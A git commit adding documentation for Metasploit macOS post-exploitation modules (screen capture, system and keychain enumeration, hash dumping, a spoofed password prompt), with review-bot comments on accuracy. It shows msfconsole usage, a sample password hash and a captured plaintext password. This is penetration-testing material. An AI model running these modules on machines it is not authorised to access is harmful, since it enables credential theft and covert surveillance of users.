osx docs and cleanup
parent f41a90a582
commit 621c7182bf
@ -0,0 +1,85 @@
## Vulnerable Application

This module will speak whatever is in the 'TEXT' option on the victim machine.

## Verification Steps

1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/admin/say```
4. Do: ```run```
5. You should hear 'metasploit' through the speakers

## Options

**TEXT**

The text that should be read. Default is `meta-sploit!`.

**VOICE**

The voice to use. Default is `alex`.
This can be obtained on the system by specifying `-v ?` (example from 10.14.4):

```
say -v ?
Alex en_US # Most people recognize me by my voice.
Alice it_IT # Salve, mi chiamo Alice e sono una voce italiana.
Alva sv_SE # Hej, jag heter Alva. Jag är en svensk röst.
Amelie fr_CA # Bonjour, je m’appelle Amelie. Je suis une voix canadienne.
Anna de_DE # Hallo, ich heiße Anna und ich bin eine deutsche Stimme.
Carmit he_IL # שלום. קוראים לי כרמית, ואני קול בשפה העברית.
Damayanti id_ID # Halo, nama saya Damayanti. Saya berbahasa Indonesia.
Daniel en_GB # Hello, my name is Daniel. I am a British-English voice.
Diego es_AR # Hola, me llamo Diego y soy una voz española.
Ellen nl_BE # Hallo, mijn naam is Ellen. Ik ben een Belgische stem.
Fiona en-scotland # Hello, my name is Fiona. I am a Scottish-English voice.
Fred en_US # I sure like being inside this fancy computer
Ioana ro_RO # Bună, mă cheamă Ioana . Sunt o voce românească.
Joana pt_PT # Olá, chamo-me Joana e dou voz ao português falado em Portugal.
Jorge es_ES # Hola, me llamo Jorge y soy una voz española.
Juan es_MX # Hola, me llamo Juan y soy una voz mexicana.
Kanya th_TH # สวัสดีค่ะ ดิฉันชื่อKanya
Karen en_AU # Hello, my name is Karen. I am an Australian-English voice.
Kyoko ja_JP # こんにちは、私の名前はKyokoです。日本語の音声をお届けします。
Laura sk_SK # Ahoj. Volám sa Laura . Som hlas v slovenskom jazyku.
Lekha hi_IN # नमस्कार, मेरा नाम लेखा है. मैं हिन्दी में बोलने वाली आवाज़ हूँ.
Luca it_IT # Salve, mi chiamo Luca e sono una voce italiana.
Luciana pt_BR # Olá, o meu nome é Luciana e a minha voz corresponde ao português que é falado no Brasil
Maged ar_SA # مرحبًا اسمي Maged. أنا عربي من السعودية.
Mariska hu_HU # Üdvözlöm! Mariska vagyok. Én vagyok a magyar hang.
Mei-Jia zh_TW # 您好,我叫美佳。我說國語。
Melina el_GR # Γεια σας, ονομάζομαι Melina. Είμαι μια ελληνική φωνή.
Milena ru_RU # Здравствуйте, меня зовут Milena. Я – русский голос системы.
Moira en_IE # Hello, my name is Moira. I am an Irish-English voice.
Monica es_ES # Hola, me llamo Monica y soy una voz española.
Nora nb_NO # Hei, jeg heter Nora. Jeg er en norsk stemme.
Paulina es_MX # Hola, me llamo Paulina y soy una voz mexicana.
Samantha en_US # Hello, my name is Samantha. I am an American-English voice.
Sara da_DK # Hej, jeg hedder Sara. Jeg er en dansk stemme.
Satu fi_FI # Hei, minun nimeni on Satu. Olen suomalainen ääni.
Sin-ji zh_HK # 您好,我叫 Sin-ji。我講廣東話。
Tessa en_ZA # Hello, my name is Tessa. I am a South African-English voice.
Thomas fr_FR # Bonjour, je m’appelle Thomas. Je suis une voix française.
Ting-Ting zh_CN # 您好,我叫Ting-Ting。我讲中文普通话。
Veena en_IN # Hello, my name is Veena. I am an Indian-English voice.
Victoria en_US # Isn't it nice to have a computer that will talk to you?
Xander nl_NL # Hallo, mijn naam is Xander. Ik ben een Nederlandse stem.
Yelda tr_TR # Merhaba, benim adım Yelda. Ben Türkçe bir sesim.
Yuna ko_KR # 안녕하세요. 제 이름은 Yuna입니다. 저는 한국어 음성입니다.
Yuri ru_RU # Здравствуйте, меня зовут Yuri. Я – русский голос системы.
Zosia pl_PL # Witaj. Mam na imię Zosia, jestem głosem kobiecym dla języka polskiego.
Zuzana cs_CZ # Dobrý den, jmenuji se Zuzana. Jsem český hlas.
```

## Scenarios

### User level shell on OSX 10.14.4

```
msf5 auxiliary(scanner/ssh/ssh_login) > use post/osx/admin/say
msf5 post(osx/admin/say) > set session 1
session => 1
msf5 post(osx/admin/say) > run
[*] Post module execution completed
```
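Review bot: Verification step 5 says you should hear 'metasploit', but the TEXT option documents its default as `meta-sploit!`; make the two agree so a tester knows what a default run should produce. The VOICE default is written as `alex` while the `say -v ?` listing shows `Alex`; state which form the module passes to `say` so readers do not have to guess whether case matters. Minor: steps 3 and 4 wrap inline commands in triple backticks where single backticks (`use post/osx/admin/say`) are the usual inline form.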
@ -0,0 +1,53 @@
## Vulnerable Application

This module takes screenshots of target desktop and automatically downloads them.

## Verification Steps

1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/capture/screen```
5. Do: ```set session #```
5. Do: ```run```
6. You should have a screenshot saved to loot

## Options

**COUNT**
The number of screenshots to collect. Default is `1`.

**DELAY**
Interval between screenshots in seconds. 0 for no delay. Default is `10`.

**EXE_PATH**
Path to remote screencapture executable. Default is `/usr/sbin/screencapture`

**FILETYPE**
File format to use when saving a snapshot (Accepted: png, gif). Default is `png`.

**TMP_PATH**
Path to remote temp directory. Default is `/tmp/<random>`

## Scenarios

### User level shell on OSX 10.14.4

```
msf5 post(osx/capture/keylog_recorder) > use post/osx/capture/screen
msf5 post(osx/capture/screen) > set session 1
session => 1
msf5 post(osx/capture/screen) > run

[*] Capturing 1 screenshots with a delay of 10 seconds
[*] Screen Capturing Complete
[*] Use "loot -t screen_capture.screenshot" to see file locations of your newly acquired loot
[*] Post module execution completed
msf5 post(osx/capture/screen) > loot -t screen_capture.screenshot

Loot
====

host service type name content info path
---- ------- ---- ---- ------- ---- ----
222.222.2.222 screen_capture.screenshot screenshot.0.png image/png Screenshot /loot/20190414205923_default_222.222.2.222_screen_capture.s_194117.png
```
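Review bot: The Verification Steps are numbered 3, 5, 5, 6; the `set session #` step should be 4. The DELAY description ('Interval between screenshots in seconds') should add that it only takes effect when COUNT is greater than 1, since the default COUNT of `1` yields a single capture with no interval. Minor: the scenario prompt is carried over from `post(osx/capture/keylog_recorder)`, which is harmless but may puzzle a reader who expects to start from `msf5 >`.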
@ -0,0 +1,120 @@
## Vulnerable Application

This module gathers basic system information from Mac OS X Tiger (10.4), through Mojave (10.14).

The following information is enumerated:

1. OS
2. Network
3. Bluetooth
4. Ethernet
5. Printers
6. USB
7. Airport
8. Firewall
9. Known Networks
10. Applications
11. Development Tools
12. Frameworks
13. Logs
14. Preference Panes
15. StartUp
16. TCP/UDP Connections
17. Environment Variables
18. Last Boottime
19. Current Activity
20. Process List
21. Users & Groups
22. User history files (`.bash_history`)
23. User keychains (downloaded as well)

## Verification Steps

1. Start msfconsole
2. Get a shell, user level is fine
3. Do: ```use post/osx/gather/enum_osx```
4. Do: ```set session #```
5. Do: ```run```
6. You should have lots of files saved to the logs folder

## Scenarios

### User level shell on OSX 10.14.4

```
msf5 > use post/osx/gather/enum_osx
msf5 post(osx/gather/enum_osx) > show options

Module options (post/osx/gather/enum_osx):

Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.

msf5 post(osx/gather/enum_osx) > set session 1
session => 1
msf5 post(osx/gather/enum_osx) > run

[*] Running module against MacBook-Pro.nogroup
[*] Saving all data to /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
[*] Enumerating OS
[*] Enumerating Network
[*] Enumerating Bluetooth
[*] Enumerating Ethernet
[*] Enumerating Printers
[*] Enumerating USB
[*] Enumerating Airport
[*] Enumerating Firewall
[*] Enumerating Known Networks
[*] Enumerating Applications
[*] Enumerating Development Tools
[*] Enumerating Frameworks
[*] Enumerating Logs
[*] Enumerating Preference Panes
[*] Enumerating StartUp
[*] Enumerating TCP Connections
[*] Enumerating UDP Connections
[*] Enumerating Environment Variables
[*] Enumerating Last Boottime
[*] Enumerating Current Activity
[*] Enumerating Process List
[*] Enumerating Users
[*] Enumerating Groups
[*] Extracting history files
[*] History file .bash_history found for h00die
[*] Downloading .bash_history
[*] Enumerating and Downloading keychains for h00die
[*] Post module execution completed
msf5 post(osx/gather/enum_osx) > ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738
[*] exec: ls -lah /logs/post/enum_osx/MacBook-Pro.nogroup_20190415.5738

total 1.4M
drwxr-xr-x 2 root root 4.0K Apr 15 07:58 .
drwxr-xr-x 3 root root 4.0K Apr 15 07:57 ..
-rw-r--r-- 1 root root 4.2K Apr 15 07:57 Airport.txt
-rw-r--r-- 1 root root 87K Apr 15 07:57 Applications.txt
-rw-r--r-- 1 root root 3.5K Apr 15 07:57 Bluetooth.txt
-rw-r--r-- 1 root root 64 Apr 15 07:58 Current Activity.txt
-rw-r--r-- 1 root root 0 Apr 15 07:57 Development Tools.txt
-rw-r--r-- 1 root root 308 Apr 15 07:58 Environment Variables.txt
-rw-r--r-- 1 root root 0 Apr 15 07:57 Ethernet.txt
-rw-r--r-- 1 root root 129 Apr 15 07:57 Firewall.txt
-rw-r--r-- 1 root root 316K Apr 15 07:58 Frameworks.txt
-rw-r--r-- 1 root root 62 Apr 15 07:58 Groups.txt
-rw-r--r-- 1 root root 414 Apr 15 07:58 h00die_.bash_history.txt
-rw-r--r-- 1 root root 63 Apr 15 07:58 h00die_bash__line_342__usr_bin_security__No_such_file_or_directory
-rw-r--r-- 1 root root 1.3K Apr 15 07:57 Known Networks.txt
-rw-r--r-- 1 root root 32 Apr 15 07:58 Last Boottime.txt
-rw-r--r-- 1 root root 841K Apr 15 07:58 Logs.txt
-rw-r--r-- 1 root root 2.1K Apr 15 07:57 Network.txt
-rw-r--r-- 1 root root 364 Apr 15 07:57 OS.txt
-rw-r--r-- 1 root root 8.8K Apr 15 07:58 Preference Panes.txt
-rw-r--r-- 1 root root 204 Apr 15 07:57 Printers.txt
-rw-r--r-- 1 root root 34K Apr 15 07:58 Process List.txt
-rw-r--r-- 1 root root 0 Apr 15 07:58 StartUp.txt
-rw-r--r-- 1 root root 739 Apr 15 07:58 TCP Connections.txt
-rw-r--r-- 1 root root 4.1K Apr 15 07:58 UDP Connections.txt
-rw-r--r-- 1 root root 1.7K Apr 15 07:57 USB.txt
-rw-r--r-- 1 root root 62 Apr 15 07:58 Users.txt
```
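Review bot: The scenario's directory listing contains a file named `h00die_bash__line_342__usr_bin_security__No_such_file_or_directory`, which is the shell error `bash: line 342: /usr/bin/security: No such file or directory` turned into a keychain filename; so the keychain step did not actually download anything on 10.14.4 even though the log reports 'Enumerating and Downloading keychains for h00die'. Either have the module check the result of the keychain listing before creating files from its output, or state in the doc that keychain download was not verified on Mojave. A sentence on the zero-byte `Development Tools.txt`, `Ethernet.txt`, and `StartUp.txt` would also tell readers that an empty file is expected on this version rather than a failure.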
@ -0,0 +1,45 @@
## Vulnerable Application

This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports versions 10.3 to 10.14.

## Verification Steps

1. Start msfconsole
2. Get a root privileged shell
3. Do: ```use post/osx/gather/hashdump```
4. Do: ```set session #```
5. Do: ```run```
6. You should see hashes dumped and stored to creds (if db is connected)

## Options

**MATCHUSER**
A regex to run against usernames. Only matched usernames will have their hashes dumped.

## Scenarios

### User level shell on OSX 10.14.4

```
msf5 post(osx/gather/hashdump) > run

[-] Post aborted due to failure: bad-config: Insufficient Privileges: must be running as root to dump the hashes
[*] Post module execution completed
```

### Root level shell on OSX 10.14.4

```
msf5 post(osx/gather/hashdump) > run

[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user h00die...
[+] SHA-512 PBKDF2:h00die:$ml$67012$52a3da29923ab1680ae7c28b40a3ba7c2386c679af0392011f706c4ec2a22475$5c935f59a173d25bd4ed5cf59464930153198ea28b70d1e4bb5fe5e39828bec8347419dc53f0f0d93f08399f30b56adcd0f9a6f6e834ba33cba58d6b35fd1021bd81e63edf2a5b2265d8c4b7908d9bcfe127cbcd3c2092d2ab58f1b7a16dc3e11e0d5a7b027c254f3f91fdeb5acc92bcf5a3cc033319f5209f635c0494854a2e
[*] Credential saved in database.
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Attempting to grab shadow for user nobody...
[*] Attempting to grab shadow for user root...
[*] Attempting to grab shadow for user daemon...
[*] Post module execution completed
```
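Review bot: In the root-shell scenario, `nobody`, `root`, and `daemon` each appear twice in 'Attempting to grab shadow for user ...', which suggests the user list fed to the dump loop contains duplicates; deduplicate it in the module or explain the second pass in the doc. The user-shell scenario is a good negative case, and verification step 2 could say outright that the module aborts with `bad-config: Insufficient Privileges` when the session is not root, which is exactly what that scenario shows.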
@ -0,0 +1,79 @@
## Vulnerable Application

Presents a password prompt dialog to a logged-in OSX user. Depending on the version of OSX, additional steps may be necessary to
allow permission for the prompt to be displayed. See Scenarios for additional details.

## Verification Steps

1. Start msfconsole
2. Get a shell, user level is fine.
3. Do: ```use post/osx/gather/password_prompt_spoof```
4. Do: ```set session #```
5. Do: ```run```
6. The user will be prompted to enter their password, or complete additional steps.

## Options

**BUNDLEPATH**
Path to bundle containing icon. Default is `/System/Library/CoreServices/CoreTypes.bundle`.

**ICONFILE**
Icon filename relative to bundle. Default is `UserUnknownIcon.icns`

**TEXTCREDS**
Text displayed when asking for a password. Default is `Type your password to allow System Preferences to make changes`.

**TIMEOUT**
Timeout for user to enter credentails. Default is `60`. Newer versions of OSX may require additional time due to user interaction.

## Scenarios

### User level shell on OSX 10.14.4

If the user does not complete the prompt in time, or does not enable permissions to receive the prompt:

```
msf5 post(osx/gather/password_prompt_spoof) > run

[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Timeout period expired before credentials were entered!
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.SGFvISFemjti
[*] Post module execution completed
```

If the user DOES complete the prompt in time:

```
msf5 post(osx/gather/password_prompt_spoof) > run

[*] Running module against MacBook-Pro.nogroup
[*] Waiting for user 'h00die' to enter credentials...
[*] Password entered! What a nice compliant user...
[+] password file contents: 20190415_122536:h00die:alfalfasprouts!
[+] Password data stored as loot in: /loot/20190415122537_default_192.168.2.225_password_355107.txt
[*] Cleaning up files in MacBook-Pro.nogroup:/tmp/.jJATztdro
[*] Post module execution completed
```

#### User Experience

The following screen shots are from OSX 10.14.4 from a `ssh_login` shell as the user. Executable may change depending on the shell type and user permissions.

The user is first prompts for additional permissions (System Events):

<img width="423" alt="Screen Shot 2019-04-15 at 12 19 38 PM" src="https://user-images.githubusercontent.com/752491/56173728-ead79c80-5fbc-11e9-8a8f-3b3265220c95.png">

Next, the user is prompted to allow Accessibility Access (Events):

<img width="463" alt="Screen Shot 2019-04-15 at 12 20 08 PM" src="https://user-images.githubusercontent.com/752491/56173737-f4f99b00-5fbc-11e9-9dcc-efbfe0cd08eb.png">

Clicking Open System Preferences shows the executable asking for the permissions. The screenshot was taken after clicking the lock in the bottom left corner,
and checking `sshd-keygen-wrapper`:

<img width="670" alt="Screen Shot 2019-04-15 at 12 24 27 PM" src="https://user-images.githubusercontent.com/752491/56173742-fa56e580-5fbc-11e9-8d28-5669e9e9448f.png">

Finally, if done within the `TIMEOUT` (or with all required permissions):

<img width="424" alt="Screen Shot 2019-04-15 at 12 25 25 PM" src="https://user-images.githubusercontent.com/752491/56173748-fe830300-5fbc-11e9-9564-0e7137b051a8.png">
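Review bot: Typos in this hunk: 'credentails' in the TIMEOUT description should be 'credentials', and 'The user is first prompts for additional permissions' should read 'The user is first prompted for additional permissions'. Since on 10.14.4 the dialog only appears after the user has granted the System Events and Accessibility permissions shown in the screenshots, the opening sentence 'See Scenarios for additional details' should point at the 'User Experience' subsection specifically, and the TIMEOUT section's note that newer versions need more time belongs next to it. 'Executable may change depending on the shell type and user permissions' would be clearer as 'The executable named in the Accessibility pane (here `sshd-keygen-wrapper`) depends on how the session was obtained'.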
@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
[ true, 'The time between transferring log chunks.', 10 ]
),
OptPort.new('LOGPORT',
[ false, 'Local port opened for momentarily for log transfer', 22899 ]
[ false, 'Local port opened momentarily for log transfer', 22899 ]
)
]
)
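Review bot: The wording fix is correct, but 'momentarily' still leaves the lifetime of the port unstated; if the listener is opened for each chunk transfer and closed afterwards (the preceding option describes 'The time between transferring log chunks'), 'Local port opened only for the duration of each log transfer' says so and helps anyone writing firewall rules on the handler side.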
@ -14,8 +14,8 @@ class MetasploitModule < Msf::Post
super( update_info( info,
'Name' => 'OS X Gather Mac OS X System Information Enumeration',
'Description' => %q{
This module gathers basic system information from Mac OS X Tiger, Leopard,
Snow Leopard and Lion systems.
This module gathers basic system information from Mac OS X Tiger (10.4), through
Mojave (10.14).
},
'License' => MSF_LICENSE,
'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
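Review bot: Stray comma in the new description: 'Tiger (10.4), through Mojave (10.14)' should be 'Tiger (10.4) through Mojave (10.14)'; the same comma appears in the new documentation file and should be fixed in both places. The two lines could also be joined into one inside the `%q{}` block.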
@ -20,7 +20,7 @@ class MetasploitModule < Msf::Post
'Name' => 'OS X Gather Mac OS X Password Hash Collector',
'Description' => %q{
This module dumps SHA-1, LM, NT, and SHA-512 Hashes on OSX. Supports
versions 10.3 to 10.9.
versions 10.3 to 10.14.
},
'License' => MSF_LICENSE,
'Author' => [
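Review bot: The upper bound moves from 10.9 to 10.14, but the description still lists SHA-1, LM, NT, and SHA-512 without saying which formats apply to which releases; the accompanying scenario only shows a `$ml$` SHA-512 PBKDF2 hash on 10.14.4, so noting that only the PBKDF2 path was exercised on Mojave, and which release ranges the older formats belong to, would keep the support claim accurate.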